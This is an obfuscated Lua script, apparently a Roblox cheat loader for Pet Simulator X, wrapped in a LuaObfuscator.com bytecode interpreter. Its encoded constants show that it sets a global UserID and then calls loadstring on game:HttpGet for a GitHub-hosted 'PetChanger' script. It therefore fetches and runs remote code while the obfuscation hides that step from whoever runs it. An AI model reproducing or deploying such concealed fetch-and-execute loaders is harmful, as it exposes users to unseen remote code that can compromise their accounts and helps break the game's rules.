
--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v69=495 -(480 + 15);while true do if (v69==1) then if (v39==(1464 -(620 + 842))) then for v105=1 + 0,v44 do local v106=0;local v107;local v108;local v109;while true do if (v106~=0) then else v107=0;v108=nil;v106=1;end if (v106==(402 -(277 + 124))) then v109=nil;while true do if (v107~=(1063 -(696 + 367))) then else v108=v22();v109=nil;v107=1;end if (v107==(258 -(21 + 236))) then if (v108==(1 + 0)) then v109=v22()~=0;elseif (v108==(1052 -(104 + 946))) then v109=v25();elseif (v108==(5 -2)) then v109=v26();end v45[v105]=v109;break;end end break;end end end v43[10 -7]=v22();for v110=1,v24() do local v111=0;local v112;while true do if (v111~=(1755 -(197 + 1558))) then else v112=v22();if (v21(v112,1,1)==(0 -0)) then local v118=0 + 0;local v119;local v120;local v121;local v122;while true do if (v118~=0) then else local v130=0 + 0;while true do if (v130==1) then v118=1;break;end if (v130==0) then v119=0 -0;v120=nil;v130=1;end end end if (v118==(418 -(196 + 220))) then while true do if (v119~=2) then else local v132=0 + 0;local v133;while true do if (v132==0) then v133=0 -0;while true do if (v133~=(1693 -(957 + 735))) then else v119=12 -9;break;end if (v133==(0 + 0)) then local v164=0;while true do if (v164==(1893 -(740 + 1153))) then local v176=0;while true do if (v176~=(206 -(64 + 142))) then else if (v21(v121,1,1)==1) then v122[2]=v45[v122[2]];end if (v21(v121,2 + 0,4 -2)==(1458 -(1385 + 72))) then v122[1071 -(235 + 833)]=v45[v122[3 -0]];end v176=71 -(48 + 22);end if (v176==1) then v164=1;break;end end end if (v164==1) then v133=1 + 0;break;end end end end break;end end end if (v119==0) then local v134=1237 -(376 + 861);local v135;while true do if (v134==(0 -0)) then v135=0;while true do if (v135~=(0 + 0)) then else local v165=0 + 0;local v166;while true do if (v165==(0 + 0)) then v166=132 -(57 + 75);while true do if (v166==1) then v135=1;break;end if (v166==0) then local v185=0;while true do if (v185==0) then v120=v21(v112,2,3);v121=v21(v112,4,14 -8);v185=1;end if (v185==(1 -0)) then v166=1;break;end end end end break;end end end if ((2 -1)~=v135) then else v119=1 -0;break;end end break;end end end if (v119~=3) then else if (v21(v121,3,1558 -(161 + 1394))~=1) then else v122[13 -9]=v45[v122[4]];end v40[v110]=v122;break;end if ((4 -3)==v119) then local v137=0 -0;local v138;local v139;while true do if (v137~=(61 -(58 + 3))) then else v138=0;v139=nil;v137=1;end if (v137==1) then while true do if (v138~=(1545 -(704 + 841))) then else v139=0 -0;while true do if (v139~=(1937 -(1419 + 517))) then else v119=2;break;end if ((0 + 0)==v139) then local v177=0;local v178;while true do if (v177==(0 -0)) then v178=0;while true do if (v178==1) then v139=1;break;end if (v178==0) then local v190=0 -0;while true do if (v190==1) then v178=1;break;end if (v190~=(0 -0)) then else v122={v23(),v23(),nil,nil};if (v120==0) then local v194=0;while true do if (v194==(0 + 0)) then v122[3]=v23();v122[1846 -(469 + 1373)]=v23();break;end end elseif (v120==1) then v122[3]=v24();elseif (v120==(2 -0)) then v122[1816 -(1597 + 216)]=v24() -(2^16);elseif (v120~=(1608 -(1484 + 121))) then else local v201=1954 -(791 + 1163);local v202;local v203;local v204;while true do if (v201==1) then v204=nil;while true do if (0==v202) then local v205=1844 -(583 + 1261);while true do if (v205~=1) then else v202=1;break;end if (v205==0) then v203=0;v204=nil;v205=1 -0;end end end if (v202==(1362 -(400 + 961))) then while true do if (v203==0) then v204=0 -0;while true do if ((0 -0)==v204) then v122[7 -4]=v24() -((3 -1)^(1829 -(1732 + 81)));v122[4]=v23();break;end end break;end end break;end end break;end if (v201==(1201 -(946 + 255))) then v202=0 -0;v203=nil;v201=1;end end end v190=2 -1;end end end end break;end end end end break;end end break;end end end end break;end if ((1 -0)==v118) then local v131=0 + 0;while true do if (v131~=0) then else v121=nil;v122=nil;v131=2 -1;end if (1~=v131) then else v118=2;break;end end end end end break;end end end v39=183 -(129 + 51);end if (v39==1) then v43={v40,v41,nil,v42};v44=v24();v45={};v39=4 -2;end break;end if (v69~=(0 + 0)) then else if (v39==(0 -0)) then local v98=0 + 0;while true do if (v98==(0 -0)) then v40={};v41={};v98=1 + 0;end if (v98~=(1 + 0)) then else v42={};v39=1;break;end end end if (v39==3) then local v99=480 -(430 + 50);local v100;while true do if (v99==(521 -(184 + 337))) then v100=0 -0;while true do if (v100==1) then return v43;end if (v100==0) then for v126=1,v24() do v41[v126-(1215 -(311 + 903))]=v29();end for v128=198 -(158 + 39),v24() do v42[v128]=v24();end v100=1;end end break;end end end v69=1;end end end end;v18=5;end if (2==v18) then v23=function()local v46=0 + 0 + 0;local v47;local v48;while true do if (v46==(3 -2)) then return (v48 * (256 + 0)) + v47;end if (v46==(0 + 0)) then v47,v48=v1(v16,v19,v19 + 2);v19=v19 + (925 -(351 + 572));v46=189 -(170 + (53 -35));end end end;v24=nil;v24=function()local v49,v50,v51,v52=v1(v16,v19,v19 + (8 -5));v19=v19 + 4;return (v52 * 16777216) + (v51 * (249158 -183622)) + (v50 * (787 -531)) + v49;end;v25=nil;v18=3;end if (v18==3) then v25=function()local v53=1465 -(529 + 936);local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v53==(1984 -(1290 + 693))) then v56=1;v57=(v21(v55,962 -(145 + 816),3 + 17) * ((5 -3)^32)) + v54;v53=(3137 -(1277 + 323)) -(783 + 752);end if ((1710 -(385 + 429 + 894))==v53) then v58=v21(v55,15 + 6,8 + 23);v59=((v21(v55,10 + 22)==(943 -(859 + 83))) and  -(1 + 0)) or (2 -1);v53=5 -(4 -2);end if (v53==(0 -0)) then v54=v24();v55=v24();v53=1 + 0;end if (v53==(10 -(2 + 5))) then if (v58==(436 -((1823 -(915 + 726)) + 254))) then if (v57==(41 -(6 + 35))) then return v59 * (0 + 0);else v58=1;v56=0;end elseif (v58==(1638 + 409)) then return ((v57==(0 -0)) and (v59 * ((1 + 0)/(0 -0)))) or (v59 * NaN);end return v8(v59,v58-(1 + 1022)) * (v56 + (v57/((2 -0)^(543 -(487 + 4)))));end end end;v26=nil;v26=function(v31)local v60=1850 -(249 + 1601);local v61;local v62;while true do if (v60==(736 -(115 + 478 + 143))) then v61=nil;if  not v31 then local v86=582 -((1447 -(653 + 327)) + (377 -262));while true do if (v86==(0 + 0)) then v31=v24();if (v31==0) then return "";end break;end end end v60=1;end if (v60==(945 -(593 + 349))) then return v6(v62);end if (v60==(2 + (0 -0))) then v62={};for v79=(1662 -(1596 + 64)) -1, #v61 do v62[v79]=v2(v1(v3(v61,v79,v79)));end v60=395 -(151 + 241);end if (((954 -(196 + 757)) + 0)==v60) then v61=v3(v16,v19,(v19 + v31) -(1948 -(1130 + 817)));v19=v19 + v31;v60=2 + 0;end end end;v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v32)if (v1(v32,2)==79) then local v70=0;while true do if (0==v70) then v20=v0(v3(v32,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v32,16));if v20 then local v113=v5(v72,v20);v20=nil;return v113;else return v72;end break;end end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;v30=function(v33,v34,v35)local v63=0;local v64;local v65;local v66;while true do if (0==v63) then v64=v33[1];v65=v33[2];v63=1;end if (v63==1) then v66=v33[3];return function(...)local v81=1;local v82= -1;local v83={...};local v84=v12("#",...) -1;local function v85()local v87=v64;local v88=v65;local v89=v66;local v90=v28;local v91={};local v92={};local v93={};for v101=0 + 0,v84 do if ((3011>(3606 -(744 + 27))) and (v101>=v89)) then v91[v101-v89]=v83[v101 + (1 -0)];else v93[v101]=v83[v101 + (2 -1)];end end local v94=(v84-v89) + (1785 -(914 + 870));local v95;local v96;while true do local v102=0 -0;local v103;while true do if ((v102==(0 + 0)) or ((2103 + 1223)==3133)) then v103=0 + 0;while true do if (((7421 -4281)>187) and (v103==(183 -(178 + 5)))) then v95=v87[v81];v96=v95[1 + 0];v103=1 -0;end if ((v103==((29 + 1048) -(1025 + 51))) or (705>1714)) then if (((1801 -886)>=((2008 -(379 + 1545)) + 6)) and (v96<=4)) then if (((7792 -4764)<(5910 -(732 + 826))) and (v96<=1)) then if (((159 + 28 + 992)==(2859 -(1219 + (2170 -(843 + 866))))) and (v96>(0 + 0))) then local v140=0 -0;local v141;local v142;local v143;local v144;local v145;while true do if ((1==v140) or ((5094 -2735)>=2565)) then v143=nil;v144=nil;v140=7 -5;end if (((2522 -(511 + 353))==(1542 + (432 -316))) and (v140==(0 + 0))) then v141=840 -(746 + 94);v142=nil;v140=2 -1;end if ((((734 + 1644) -(585 + (1829 -(52 + 852))))<=(11300 -7920)) and (v140==(6 -4))) then v145=nil;while true do if (((5959 -(729 + 426))>=(138 + 1323)) and (v141==(1 + 1))) then for v171=v142,v82 do local v172=649 -((2378 -(1629 + 117)) + 17);local v173;local v174;while true do if ((v172==1) or (1432<((93 + 28) -88))) then while true do if ((v173==0) or ((5 + (1060 -(746 + 313)))>=2815)) then v174=1812 -((1781 -(618 + 325)) + 974);while true do if ((v174==0) or (1414==(288 + 3850))) then v145=v145 + (252 -(162 + 89));v93[v171]=v143[v145];break;end end break;end end break;end if (((1046 -756)<(2796 + 1021)) and (v172==(0 + (774 -(270 + 504))))) then v173=0 + 0 + 0;v174=nil;v172=505 -(295 + 209);end end end break;end if (((346 -211)<(3886 -(1211 + 451))) and (v141==(1 -0))) then local v167=0 -0;while true do if (((5579 -(1137 + 214))==(5401 -(1031 + 142))) and (v167==(3 -2))) then v141=7 -5;break;end if ((v167==0) or ((341 + 167)>(1802 -(639 + 48)))) then v82=(v144 + v142) -(168 -(28 + 81 + 58));v145=1211 -(440 + 771);v167=4 -(1366 -(177 + 1186));end end end if ((v141==(84 -(37 + 47))) or (((6264 -3549) -1861)>=(3629 -2124))) then local v168=0 + 0;while true do if ((v168==(0 -0)) or (310>3020)) then v142=v95[2];v143,v144=v90(v93[v142](v13(v93,v142 + 1,v95[3 + 0])));v168=2 -(1749 -(646 + 1102));end if (((1743 + (1388 -(946 + 410)))<3000) and (v168==((1218 -(445 + 772)) + 0))) then v141=1 + 0 + 0;break;end end end end break;end end else v93[v95[2]]=v95[3];end elseif (((5851 -2935)>=(2498 -(287 + 604))) and (v96<=(1 + 1))) then if ((v93[v95[(852 -(204 + 447)) -(182 + 17)]]==v95[4]) or (811<((1850 -(1218 + 169)) -341))) then v81=v81 + (2 -1);else v81=v95[1421 -(1005 + 413)];end elseif ((v96==(1 + 2)) or (4154==((153 + 5261) -2476))) then v93[v95[1886 -(576 + 1308)]][v95[2 + 1]]=v95[2 + (1967 -(372 + 1593))];else do return;end end elseif (((4100 -(481 + 599))==(4850 -(1017 + 813))) and (v96<=(6 + 0))) then if (((4726 -2156)>=(6850 -(6035 -(961 + 23)))) and (v96>((9 + 0) -4))) then v81=v95[3];else v93[v95[1559 -(568 + 989)]]=v35[v95[3 + (1989 -(1186 + 803))]];end elseif (((3078 + 1223)>(1172 + 1161 + 1003)) and (v96<=(24 -17))) then local v151=1166 -(261 + 905);local v152;local v153;while true do if (((3423 -(636 + (949 -(68 + 222))))<3950) and (v151==(1 + 0))) then while true do if (((8695 -4057)>=(4825 -(447 + 8))) and (v152==0)) then v153=v95[2];v93[v153]=v93[v153](v13(v93,v153 + ((3 -1) -1),v82));break;end end break;end if (((5041 -(403 + 517))>((638 + 48) -(74 + 59))) and (v151==((2959 -1093) -(411 + 1455)))) then v152=0 -0;v153=nil;v151=933 -(702 + 230);end end elseif ((v96==(27 -19)) or ((154 + 13)>=(2825 + 6))) then local v159=0;local v160;local v161;local v162;local v163;while true do if (((4 -2)==v159) or ((214 + 1470)<(1991 -(611 + 1121)))) then while true do if ((v160==0) or ((513 + 257)>=(223 + 1055))) then local v175=0 + 0;while true do if (((1579 -455)<(2433 -(775 + 308))) and (v175==(1599 -(467 + 1132)))) then v161=0 -0;v162=nil;v175=1;end if ((v175==1) or ((2108 + 51)<=(34 + 110))) then v160=751 -(340 + 410);break;end end end if ((v160==(1 + 0)) or ((4415 -2267)<=((770 + 3346) -3048))) then v163=nil;while true do if (((2009 -1019)<(3332 -(628 + 561))) and (v161==((3 -2) + 0))) then v93[v162 + (1 -0)]=v163;v93[v162]=v163[v95[(19 -8) -7]];break;end if ((v161==0) or ((3184 -2173)>=(5587 -(939 + 121 + 752)))) then local v183=560 -(531 + 29);local v184;while true do if ((v183==(0 -0)) or (196==(5254 -1102))) then v184=0 -0;while true do if ((v184==(0 -0)) or ((219 + 973)>=(1813 + 437))) then local v193=0 + 0;while true do if ((v193==(0 + 0)) or ((4659 -2173)<=(2543 -(619 + 466)))) then v162=v95[4 -2];v163=v93[v95[1818 -(1224 + 591)]];v193=1;end if ((v193==(1 -0)) or ((76 + 296)>=(585 + 1494))) then v184=1;break;end end end if ((v184==(1 + 0 + 0)) or ((3569 -1858)>2738)) then v161=242 -(78 + 163);break;end end break;end end end end break;end end break;end if ((((1941 -(31 + 952)) -595)<2116) and (v159==(1479 -(896 + 582)))) then v162=nil;v163=nil;v159=1 + 1;end if (((2427 -(1482 + 157))<(14273 -9326)) and (v159==0)) then v160=0;v161=nil;v159=2 -1;end end else v93[v95[249 -(220 + 27)]]();end v81=v81 + 1;break;end end break;end end end end A,B=v28(v11(v85));if  not A[1] then local v104=v33[4][v81] or "?";error("Script error at ["   .. v104   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end end end;return v30(v29(),{},v17)(...);end if (v18==1) then v21=function(v36,v37,v38)if v38 then local v73=0;local v74;while true do if (v73==(0 -(789 -(603 + 186)))) then v74=(v36/((561 -(395 + 164))^(v37-(1 + 0))))%(((5 -3) + (1871 -(1349 + 522)))^(((v38-1) -(v37-(2 -1))) + 1 + 0));return v74-(v74%(1 + 0));end end else local v75=(4 -2)^(v37-(588 -((2237 -(964 + 933)) + 247)));return (((v36%(v75 + v75))>=v75) and (2 -1)) or ((0 -0) + 0);end end;v22=nil;v22=function()local v67=(0 -0) -0;local v68;while true do if (v67==(3 -2)) then return v68;end if (v67==(0 + 0)) then v68=v1(v16,v19,v19);v19=v19 + 1;v67=1 + 0;end end end;v23=nil;v18=2;end end end v15("LOL!083O00028O0003023O005F4703063O00557365724944023O00585F199B41030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403473O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7868656E6F6E312F50657473696D756C61746F72582F6D61696E2F5065744368616E676572000F3O00124O00013O0026023O0001000100010004063O00010001001205000100023O003003000100030004001205000100053O001205000200063O00200800020002000700122O000400084O0001000200044O000700013O00022O00090001000100010004063O000E00010004063O000100012O00043O00017O000F3O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v9(),...);end
